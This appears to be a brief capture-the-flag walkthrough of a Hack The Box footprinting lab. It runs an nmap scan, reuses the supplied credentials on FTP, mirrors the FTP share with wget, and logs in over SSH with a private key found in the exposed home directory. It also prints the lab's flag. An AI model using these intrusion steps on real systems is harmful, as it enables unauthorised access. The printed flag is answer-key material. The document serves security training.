Footprinting Lab Easy

nmap results:

> nmap -F --min-rate=1000 -sV

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 12:43 EST
Nmap scan report for 10.129.147.183
Host is up (0.072s latency).
Not shown: 56 filtered tcp ports (no-response), 41 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2121/tcp open  ccproxy-ftp?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.32 seconds

try ssh authenticate with credentials given ceil:qwer1234 -> fail
try ftp authenticate with those credentials -> success
#FTP
There is nothing in the ftp server

try ftp at port 2121 -> wget -m --no-passive ftp://ceil:qwer1234@10.129.231.53:2121
there's a good amount of stuff

> ls -a
.              .bashrc   .ssh
..             .cache    .viminfo
.bash_history  .listing
.bash_logout   .profile

use id_rsa in .ssh to login ->
#SSH
> chmod 600 id_rsa
> ssh ceil@10.129.231.53 -i id_rsa

> ceil@NIXEASY:/home/flag$ cat flag.txt
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}